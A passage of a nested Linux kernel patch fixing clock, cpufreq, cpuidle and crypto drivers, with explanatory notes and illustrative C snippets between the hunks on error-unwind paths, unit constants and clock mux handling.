+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1351,7 +1351,7 @@ static struct clk_rcg2 gcc_ufs_phy_ice_core_clk_src = {
+ 		.name = "gcc_ufs_phy_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1392,7 +1392,7 @@ static struct clk_rcg2 gcc_ufs_phy_unipro_core_clk_src = {
+ 		.name = "gcc_ufs_phy_unipro_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1414,7 +1414,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1483,7 +1483,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm8350.c b/drivers/clk/qcom/gcc-sm8350.c
+index c3731f96c8e6b..430ef407a8341 100644
+--- a/drivers/clk/qcom/gcc-sm8350.c
++++ b/drivers/clk/qcom/gcc-sm8350.c
+@@ -17,6 +17,7 @@
+ #include "clk-regmap.h"
+ #include "clk-regmap-divider.h"
+ #include "clk-regmap-mux.h"
++#include "clk-regmap-phy-mux.h"
+ #include "gdsc.h"
+ #include "reset.h"
+ 
+@@ -167,26 +168,6 @@ static const struct clk_parent_data gcc_parent_data_3[] = {
+ 	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+-static const struct parent_map gcc_parent_map_4[] = {
+-	{ P_PCIE_0_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_4[] = {
+-	{ .fw_name = "pcie_0_pipe_clk", },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+-static const struct parent_map gcc_parent_map_5[] = {
+-	{ P_PCIE_1_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_5[] = {
+-	{ .fw_name = "pcie_1_pipe_clk" },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+ static const struct parent_map gcc_parent_map_6[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_GCC_GPLL0_OUT_MAIN, 1 },
+@@ -289,32 +270,30 @@ static const struct clk_parent_data gcc_parent_data_14[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_0_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_0_pipe_clk_src = {
+ 	.reg = 0x6b054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_4,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_pipe_clk_src",
+-			.parent_data = gcc_parent_data_4,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_4),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_0_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_1_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_1_pipe_clk_src = {
+ 	.reg = 0x8d054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_5,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_pipe_clk_src",
+-			.parent_data = gcc_parent_data_5,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_5),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_1_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
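
For the sm8350 PCIe pipe clocks, clk_regmap_phy_mux_ops models the two-position mux (PHY pipe clock versus safe XO) as a single-parent clock whose enable/disable toggles the selection, so the parent_map tables removed above become unnecessary. A third port would take the same shape; the register offset and fw_name below are placeholders, not real sm8350 values:

	static struct clk_regmap_phy_mux gcc_pcie_2_pipe_clk_src = {
		.reg = 0x9d054,				/* hypothetical */
		.clkr = {
			.hw.init = &(struct clk_init_data){
				.name = "gcc_pcie_2_pipe_clk_src",
				.parent_data = &(const struct clk_parent_data){
					.fw_name = "pcie_2_pipe_clk",
				},
				.num_parents = 1,
				.ops = &clk_regmap_phy_mux_ops,
			},
		},
	};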
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 1339f9211a149..134eb1529ede2 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -696,6 +696,8 @@ static const struct qcom_cc_desc lpass_cc_sc7280_desc = {
+ 	.config = &lpass_audio_cc_sc7280_regmap_config,
+ 	.clks = lpass_cc_sc7280_clocks,
+ 	.num_clks = ARRAY_SIZE(lpass_cc_sc7280_clocks),
++	.gdscs = lpass_aon_cc_sc7280_gdscs,
++	.num_gdscs = ARRAY_SIZE(lpass_aon_cc_sc7280_gdscs),
+ };
+ 
+ static const struct qcom_cc_desc lpass_audio_cc_sc7280_desc = {
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 5c1e17bd0d763..8486d7135ab10 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -118,14 +118,18 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 		goto destroy_pm_clk;
+ 	}
+ 
+-	lpass_regmap_config.name = "qdsp6ss";
+-	desc = &lpass_qdsp6ss_sc7280_desc;
+-
+-	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+-	if (ret)
+-		goto destroy_pm_clk;
++	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
++		lpass_regmap_config.name = "qdsp6ss";
++		lpass_regmap_config.max_register = 0x3f;
++		desc = &lpass_qdsp6ss_sc7280_desc;
++
++		ret = qcom_cc_probe_by_index(pdev, 0, desc);
++		if (ret)
++			goto destroy_pm_clk;
++	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
++	lpass_regmap_config.max_register = 0x4;
+ 	desc = &lpass_cc_top_sc7280_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+diff --git a/drivers/clk/rockchip/clk-rk3399.c b/drivers/clk/rockchip/clk-rk3399.c
+index 306910a3a0d38..9ebd6c451b3db 100644
+--- a/drivers/clk/rockchip/clk-rk3399.c
++++ b/drivers/clk/rockchip/clk-rk3399.c
+@@ -1263,7 +1263,7 @@ static struct rockchip_clk_branch rk3399_clk_branches[] __initdata = {
+ 			RK3399_CLKSEL_CON(56), 6, 2, MFLAGS,
+ 			RK3399_CLKGATE_CON(10), 7, GFLAGS),
+ 
+-	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, 0,
++	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, CLK_SET_RATE_PARENT,
+ 			 RK3399_CLKSEL_CON(56), 5, 1, MFLAGS, 0, 5, DFLAGS),
+ 
+ 	/* gic */
+diff --git a/drivers/clocksource/timer-davinci.c b/drivers/clocksource/timer-davinci.c
+index 9996c05425200..b1c248498be46 100644
+--- a/drivers/clocksource/timer-davinci.c
++++ b/drivers/clocksource/timer-davinci.c
+@@ -257,21 +257,25 @@ int __init davinci_timer_register(struct clk *clk,
+ 				resource_size(&timer_cfg->reg),
+ 				"davinci-timer")) {
+ 		pr_err("Unable to request memory region\n");
+-		return -EBUSY;
++		rv = -EBUSY;
++		goto exit_clk_disable;
+ 	}
+ 
+ 	base = ioremap(timer_cfg->reg.start, resource_size(&timer_cfg->reg));
+ 	if (!base) {
+ 		pr_err("Unable to map the register range\n");
+-		return -ENOMEM;
++		rv = -ENOMEM;
++		goto exit_mem_region;
+ 	}
+ 
+ 	davinci_timer_init(base);
+ 	tick_rate = clk_get_rate(clk);
+ 
+ 	clockevent = kzalloc(sizeof(*clockevent), GFP_KERNEL);
+-	if (!clockevent)
+-		return -ENOMEM;
++	if (!clockevent) {
++		rv = -ENOMEM;
++		goto exit_iounmap_base;
++	}
+ 
+ 	clockevent->dev.name = "tim12";
+ 	clockevent->dev.features = CLOCK_EVT_FEAT_ONESHOT;
+@@ -296,7 +300,7 @@ int __init davinci_timer_register(struct clk *clk,
+ 			 "clockevent/tim12", clockevent);
+ 	if (rv) {
+ 		pr_err("Unable to request the clockevent interrupt\n");
+-		return rv;
++		goto exit_free_clockevent;
+ 	}
+ 
+ 	davinci_clocksource.dev.rating = 300;
+@@ -323,13 +327,27 @@ int __init davinci_timer_register(struct clk *clk,
+ 	rv = clocksource_register_hz(&davinci_clocksource.dev, tick_rate);
+ 	if (rv) {
+ 		pr_err("Unable to register clocksource\n");
+-		return rv;
++		goto exit_free_irq;
+ 	}
+ 
+ 	sched_clock_register(davinci_timer_read_sched_clock,
+ 			     DAVINCI_TIMER_CLKSRC_BITS, tick_rate);
+ 
+ 	return 0;
++
++exit_free_irq:
++	free_irq(timer_cfg->irq[DAVINCI_TIMER_CLOCKEVENT_IRQ].start,
++			clockevent);
++exit_free_clockevent:
++	kfree(clockevent);
++exit_iounmap_base:
++	iounmap(base);
++exit_mem_region:
++	release_mem_region(timer_cfg->reg.start,
++			   resource_size(&timer_cfg->reg));
++exit_clk_disable:
++	clk_disable_unprepare(clk);
++	return rv;
+ }
+ 
+ static int __init of_davinci_timer_register(struct device_node *np)
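
davinci_timer_register() previously returned on mid-function failure without releasing the clock, memory region, mapping, clockevent or IRQ acquired earlier; the hunk converts it to the canonical unwind ladder, where each failure jumps to the label that releases everything taken so far, in reverse order of acquisition. The shape, reduced to its essentials (acquire_*/release_* are placeholders):

	static int setup(void)
	{
		int ret;

		ret = acquire_a();
		if (ret)
			return ret;

		ret = acquire_b();
		if (ret)
			goto err_release_a;

		ret = acquire_c();
		if (ret)
			goto err_release_b;

		return 0;

	err_release_b:
		release_b();
	err_release_a:
		release_a();
		return ret;
	}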
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 7e56a42750ea5..285ba51b31f60 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1727,7 +1727,7 @@ static unsigned int cpufreq_verify_current_freq(struct cpufreq_policy *policy, b
+ 		 * MHz. In such cases it is better to avoid getting into
+ 		 * unnecessary frequency updates.
+ 		 */
+-		if (abs(policy->cur - new_freq) < HZ_PER_MHZ)
++		if (abs(policy->cur - new_freq) < KHZ_PER_MHZ)
+ 			return policy->cur;
+ 
+ 		cpufreq_out_of_sync(policy, new_freq);
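
The one-line cpufreq change is a units fix: policy->cur and new_freq are kept in kHz, so the intended 1 MHz tolerance is KHZ_PER_MHZ (1000) from <linux/units.h>; HZ_PER_MHZ is 1000000, which taken as a kHz quantity widened the dead-band to roughly 1 GHz. In comment form (the macro name below is illustrative):

	/* cpufreq works in kHz, so a 1 MHz sync window is:         */
	#define SYNC_WINDOW_KHZ	KHZ_PER_MHZ	/* 1000 kHz == 1 MHz */
	/* HZ_PER_MHZ == 1000000, i.e. 1000000 kHz == 1 GHz here    */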
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 7f2680bc9a0f4..9a39a7ccfae96 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -373,13 +373,13 @@ static struct device *of_get_cci(struct device *cpu_dev)
+ 	struct platform_device *pdev;
+ 
+ 	np = of_parse_phandle(cpu_dev->of_node, "mediatek,cci", 0);
+-	if (IS_ERR_OR_NULL(np))
+-		return NULL;
++	if (!np)
++		return ERR_PTR(-ENODEV);
+ 
+ 	pdev = of_find_device_by_node(np);
+ 	of_node_put(np);
+-	if (IS_ERR_OR_NULL(pdev))
+-		return NULL;
++	if (!pdev)
++		return ERR_PTR(-ENODEV);
+ 
+ 	return &pdev->dev;
+ }
+@@ -401,7 +401,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	info->ccifreq_bound = false;
+ 	if (info->soc_data->ccifreq_supported) {
+ 		info->cci_dev = of_get_cci(info->cpu_dev);
+-		if (IS_ERR_OR_NULL(info->cci_dev)) {
++		if (IS_ERR(info->cci_dev)) {
+ 			ret = PTR_ERR(info->cci_dev);
+ 			dev_err(cpu_dev, "cpu%d: failed to get cci device\n", cpu);
+ 			return -ENODEV;
+@@ -420,7 +420,7 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->inter_clk);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get intermediate clk\n", cpu);
+-		goto out_free_resources;
++		goto out_free_mux_clock;
+ 	}
+ 
+ 	info->proc_reg = regulator_get_optional(cpu_dev, "proc");
+@@ -428,13 +428,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 		ret = PTR_ERR(info->proc_reg);
+ 		dev_err_probe(cpu_dev, ret,
+ 			      "cpu%d: failed to get proc regulator\n", cpu);
+-		goto out_free_resources;
++		goto out_free_inter_clock;
+ 	}
+ 
+ 	ret = regulator_enable(info->proc_reg);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: failed to enable vproc\n", cpu);
+-		goto out_free_resources;
++		goto out_free_proc_reg;
+ 	}
+ 
+ 	/* Both presence and absence of sram regulator are valid cases. */
+@@ -442,14 +442,14 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (IS_ERR(info->sram_reg)) {
+ 		ret = PTR_ERR(info->sram_reg);
+ 		if (ret == -EPROBE_DEFER)
+-			goto out_free_resources;
++			goto out_disable_proc_reg;
+ 
+ 		info->sram_reg = NULL;
+ 	} else {
+ 		ret = regulator_enable(info->sram_reg);
+ 		if (ret) {
+ 			dev_warn(cpu_dev, "cpu%d: failed to enable vsram\n", cpu);
+-			goto out_free_resources;
++			goto out_free_sram_reg;
+ 		}
+ 	}
+ 
+@@ -458,13 +458,13 @@ static int mtk_cpu_dvfs_info_init(struct mtk_cpu_dvfs_info *info, int cpu)
+ 	if (ret) {
+ 		dev_err(cpu_dev,
+ 			"cpu%d: failed to get OPP-sharing information\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = dev_pm_opp_of_cpumask_add_table(&info->cpus);
+ 	if (ret) {
+ 		dev_warn(cpu_dev, "cpu%d: no OPP table\n", cpu);
+-		goto out_free_resources;
++		goto out_disable_sram_reg;
+ 	}
+ 
+ 	ret = clk_prepare_enable(info->cpu_clk);
+@@ -533,43 +533,41 @@ out_disable_mux_clock:
+ out_free_opp_table:
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 
+-out_free_resources:
+-	if (regulator_is_enabled(info->proc_reg))
+-		regulator_disable(info->proc_reg);
+-	if (info->sram_reg && regulator_is_enabled(info->sram_reg))
++out_disable_sram_reg:
++	if (info->sram_reg)
+ 		regulator_disable(info->sram_reg);
+ 
+-	if (!IS_ERR(info->proc_reg))
+-		regulator_put(info->proc_reg);
+-	if (!IS_ERR(info->sram_reg))
++out_free_sram_reg:
++	if (info->sram_reg)
+ 		regulator_put(info->sram_reg);
+-	if (!IS_ERR(info->cpu_clk))
+-		clk_put(info->cpu_clk);
+-	if (!IS_ERR(info->inter_clk))
+-		clk_put(info->inter_clk);
++
++out_disable_proc_reg:
++	regulator_disable(info->proc_reg);
++
++out_free_proc_reg:
++	regulator_put(info->proc_reg);
++
++out_free_inter_clock:
++	clk_put(info->inter_clk);
++
++out_free_mux_clock:
++	clk_put(info->cpu_clk);
+ 
+ 	return ret;
+ }
+ 
+ static void mtk_cpu_dvfs_info_release(struct mtk_cpu_dvfs_info *info)
+ {
+-	if (!IS_ERR(info->proc_reg)) {
+-		regulator_disable(info->proc_reg);
+-		regulator_put(info->proc_reg);
+-	}
+-	if (!IS_ERR(info->sram_reg)) {
++	regulator_disable(info->proc_reg);
++	regulator_put(info->proc_reg);
++	if (info->sram_reg) {
+ 		regulator_disable(info->sram_reg);
+ 		regulator_put(info->sram_reg);
+ 	}
+-	if (!IS_ERR(info->cpu_clk)) {
+-		clk_disable_unprepare(info->cpu_clk);
+-		clk_put(info->cpu_clk);
+-	}
+-	if (!IS_ERR(info->inter_clk)) {
+-		clk_disable_unprepare(info->inter_clk);
+-		clk_put(info->inter_clk);
+-	}
+-
++	clk_disable_unprepare(info->cpu_clk);
++	clk_put(info->cpu_clk);
++	clk_disable_unprepare(info->inter_clk);
++	clk_put(info->inter_clk);
+ 	dev_pm_opp_of_cpumask_remove_table(&info->cpus);
+ 	dev_pm_opp_unregister_notifier(info->cpu_dev, &info->opp_nb);
+ }
+@@ -695,6 +693,15 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ 	.ccifreq_supported = false,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1360000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1360000,
++	.ccifreq_supported = false,
++};
++
+ static const struct mtk_cpufreq_platform_data mt8183_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+@@ -713,20 +720,29 @@ static const struct mtk_cpufreq_platform_data mt8186_platform_data = {
+ 	.ccifreq_supported = true,
+ };
+ 
++static const struct mtk_cpufreq_platform_data mt8516_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1310000,
++	.sram_min_volt = 0,
++	.sram_max_volt = 1310000,
++	.ccifreq_supported = false,
++};
++
+ /* List of machines supported by this driver */
+ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7622", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8167", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8176", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8183", .data = &mt8183_platform_data },
+ 	{ .compatible = "mediatek,mt8186", .data = &mt8186_platform_data },
+ 	{ .compatible = "mediatek,mt8365", .data = &mt2701_platform_data },
+-	{ .compatible = "mediatek,mt8516", .data = &mt2701_platform_data },
++	{ .compatible = "mediatek,mt8516", .data = &mt8516_platform_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, mtk_cpufreq_machines);
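
of_get_cci() now reports failure as ERR_PTR(-ENODEV) rather than NULL, matching the IS_ERR() check its caller already performs; the IS_ERR_OR_NULL() tests were papering over the mismatch. The general pattern (find_helper() is illustrative):

	#include <linux/err.h>

	static struct device *find_helper(struct device_node *np)
	{
		struct platform_device *pdev = of_find_device_by_node(np);

		if (!pdev)
			return ERR_PTR(-ENODEV);	/* errno encoded in the pointer */

		return &pdev->dev;
	}

Callers branch on IS_ERR() and recover the errno with PTR_ERR(), which a bare NULL return cannot provide. The reworked error labels in mtk_cpu_dvfs_info_init() likewise ensure each resource is released exactly once, making the IS_ERR() guards in the release path unnecessary.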
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index d10bf7635a0d5..749b60c78da5d 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -13,7 +13,6 @@
+ #include <linux/of_address.h>
+ #include <linux/of_platform.h>
+ #include <linux/pm_opp.h>
+-#include <linux/pm_qos.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
+ #include <linux/units.h>
+@@ -57,8 +56,6 @@ struct qcom_cpufreq_data {
+ 	struct cpufreq_policy *policy;
+ 
+ 	bool per_core_dcvs;
+-
+-	struct freq_qos_request throttle_freq_req;
+ };
+ 
+ static unsigned long cpu_hw_rate, xo_rate;
+@@ -343,8 +340,6 @@ static void qcom_lmh_dcvs_notify(struct qcom_cpufreq_data *data)
+ 
+ 	throttled_freq = freq_hz / HZ_PER_KHZ;
+ 
+-	freq_qos_update_request(&data->throttle_freq_req, throttled_freq);
+-
+ 	/* Update thermal pressure (the boost frequencies are accepted) */
+ 	arch_update_thermal_pressure(policy->related_cpus, throttled_freq);
+ 
+@@ -437,14 +432,6 @@ static int qcom_cpufreq_hw_lmh_init(struct cpufreq_policy *policy, int index)
+ 	if (data->throttle_irq < 0)
+ 		return data->throttle_irq;
+ 
+-	ret = freq_qos_add_request(&policy->constraints,
+-				   &data->throttle_freq_req, FREQ_QOS_MAX,
+-				   FREQ_QOS_MAX_DEFAULT_VALUE);
+-	if (ret < 0) {
+-		dev_err(&pdev->dev, "Failed to add freq constraint (%d)\n", ret);
+-		return ret;
+-	}
+-
+ 	data->cancel_throttle = false;
+ 	data->policy = policy;
+ 
+@@ -511,7 +498,6 @@ static void qcom_cpufreq_hw_lmh_exit(struct qcom_cpufreq_data *data)
+ 	if (data->throttle_irq <= 0)
+ 		return;
+ 
+-	freq_qos_remove_request(&data->throttle_freq_req);
+ 	free_irq(data->throttle_irq, data);
+ }
+ 
+diff --git a/drivers/cpuidle/cpuidle-riscv-sbi.c b/drivers/cpuidle/cpuidle-riscv-sbi.c
+index 05fe2902df9a7..af7320a768d27 100644
+--- a/drivers/cpuidle/cpuidle-riscv-sbi.c
++++ b/drivers/cpuidle/cpuidle-riscv-sbi.c
+@@ -612,7 +612,7 @@ static int __init sbi_cpuidle_init(void)
+ 	 * 2) SBI HSM extension is available
+ 	 */
+ 	if ((sbi_spec_version < sbi_mk_version(0, 3)) ||
+-	    sbi_probe_extension(SBI_EXT_HSM) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_HSM)) {
+ 		pr_info("HSM suspend not available\n");
+ 		return 0;
+ 	}
+diff --git a/drivers/crypto/Kconfig b/drivers/crypto/Kconfig
+index 4a618d80e106f..db242234c1cfa 100644
+--- a/drivers/crypto/Kconfig
++++ b/drivers/crypto/Kconfig
+@@ -810,6 +810,7 @@ config CRYPTO_DEV_SA2UL
+ 	select CRYPTO_AES
+ 	select CRYPTO_ALGAPI
+ 	select CRYPTO_AUTHENC
++	select CRYPTO_DES
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_SHA256
+ 	select CRYPTO_SHA512
+diff --git a/drivers/crypto/caam/ctrl.c b/drivers/crypto/caam/ctrl.c
+index 32253a064d0fe..3b79e0d83d40a 100644
+--- a/drivers/crypto/caam/ctrl.c
++++ b/drivers/crypto/caam/ctrl.c
+@@ -284,6 +284,10 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		const u32 rdsta_if = RDSTA_IF0 << sh_idx;
+ 		const u32 rdsta_pr = RDSTA_PR0 << sh_idx;
+ 		const u32 rdsta_mask = rdsta_if | rdsta_pr;
++
++		/* Clear the contents before using the descriptor */
++		memset(desc, 0x00, CAAM_CMD_SZ * 7);
++
+ 		/*
+ 		 * If the corresponding bit is set, this state handle
+ 		 * was initialized by somebody else, so it's left alone.
+@@ -327,8 +331,6 @@ static int instantiate_rng(struct device *ctrldev, int state_handle_mask,
+ 		}
+ 
+ 		dev_info(ctrldev, "Instantiated RNG4 SH%d\n", sh_idx);
+-		/* Clear the contents before recreating the descriptor */
+-		memset(desc, 0x00, CAAM_CMD_SZ * 7);
+ 	}
+ 
+ 	kfree(desc);
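
Hoisting the memset() to the top of the handle loop guarantees the descriptor is built on zeroed memory on every pass; the old placement only scrubbed the buffer on iterations that ran to completion, so a pass taking an early continue left the previous contents in place for the next one. Schematically (helper names hypothetical):

	for (sh_idx = 0; sh_idx < RNG4_MAX_HANDLES; sh_idx++) {
		memset(desc, 0, CAAM_CMD_SZ * 7);	/* clean slate every pass */

		if (handle_already_initialized(sh_idx))
			continue;			/* nothing stale left behind */

		build_rng_descriptor(desc, sh_idx);
		run_descriptor(desc);
	}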
+diff --git a/drivers/crypto/ccp/sp-pci.c b/drivers/crypto/ccp/sp-pci.c
+index 084d052fddccb..55411b494d69a 100644
+--- a/drivers/crypto/ccp/sp-pci.c
++++ b/drivers/crypto/ccp/sp-pci.c
+@@ -451,9 +451,9 @@ static const struct pci_device_id sp_pci_table[] = {
+ 	{ PCI_VDEVICE(AMD, 0x1468), (kernel_ulong_t)&dev_vdata[2] },
+ 	{ PCI_VDEVICE(AMD, 0x1486), (kernel_ulong_t)&dev_vdata[3] },
+ 	{ PCI_VDEVICE(AMD, 0x15DF), (kernel_ulong_t)&dev_vdata[4] },
+-	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[4] },
+ 	{ PCI_VDEVICE(AMD, 0x14CA), (kernel_ulong_t)&dev_vdata[5] },
+ 	{ PCI_VDEVICE(AMD, 0x15C7), (kernel_ulong_t)&dev_vdata[6] },
++	{ PCI_VDEVICE(AMD, 0x1649), (kernel_ulong_t)&dev_vdata[6] },
+ 	/* Last entry must be zero */
+ 	{ 0, }
+ };
+diff --git a/drivers/crypto/inside-secure/safexcel.c b/drivers/crypto/inside-secure/safexcel.c
+index ad0d8c4a71ac1..ba4613a8e84f7 100644
+--- a/drivers/crypto/inside-secure/safexcel.c
++++ b/drivers/crypto/inside-secure/safexcel.c
+@@ -1631,19 +1631,23 @@ static int safexcel_probe_generic(void *pdev,
+ 						     &priv->ring[i].rdr);
+ 		if (ret) {
+ 			dev_err(dev, "Failed to initialize rings\n");
+-			return ret;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].rdr_req = devm_kcalloc(dev,
+ 			EIP197_DEFAULT_RING_SIZE,
+ 			sizeof(*priv->ring[i].rdr_req),
+ 			GFP_KERNEL);
+-		if (!priv->ring[i].rdr_req)
+-			return -ENOMEM;
++		if (!priv->ring[i].rdr_req) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq = devm_kzalloc(dev, sizeof(*ring_irq), GFP_KERNEL);
+-		if (!ring_irq)
+-			return -ENOMEM;
++		if (!ring_irq) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		ring_irq->priv = priv;
+ 		ring_irq->ring = i;
+@@ -1657,7 +1661,8 @@ static int safexcel_probe_generic(void *pdev,
+ 						ring_irq);
+ 		if (irq < 0) {
+ 			dev_err(dev, "Failed to get IRQ ID for ring %d\n", i);
+-			return irq;
++			ret = irq;
++			goto err_cleanup_rings;
+ 		}
+ 
+ 		priv->ring[i].irq = irq;
+@@ -1669,8 +1674,10 @@ static int safexcel_probe_generic(void *pdev,
+ 		snprintf(wq_name, 9, "wq_ring%d", i);
+ 		priv->ring[i].workqueue =
+ 			create_singlethread_workqueue(wq_name);
+-		if (!priv->ring[i].workqueue)
+-			return -ENOMEM;
++		if (!priv->ring[i].workqueue) {
++			ret = -ENOMEM;
++			goto err_cleanup_rings;
++		}
+ 
+ 		priv->ring[i].requests = 0;
+ 		priv->ring[i].busy = false;
+@@ -1687,16 +1694,26 @@ static int safexcel_probe_generic(void *pdev,
+ 	ret = safexcel_hw_init(priv);
+ 	if (ret) {
+ 		dev_err(dev, "HW init failed (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	ret = safexcel_register_algorithms(priv);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register algorithms (%d)\n", ret);
+-		return ret;
++		goto err_cleanup_rings;
+ 	}
+ 
+ 	return 0;
++
++err_cleanup_rings:
++	for (i = 0; i < priv->config.rings; i++) {
++		if (priv->ring[i].irq)
++			irq_set_affinity_hint(priv->ring[i].irq, NULL);
++		if (priv->ring[i].workqueue)
++			destroy_workqueue(priv->ring[i].workqueue);
++	}
++
++	return ret;
+ }
+ 
+ static void safexcel_hw_reset_rings(struct safexcel_crypto_priv *priv)
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
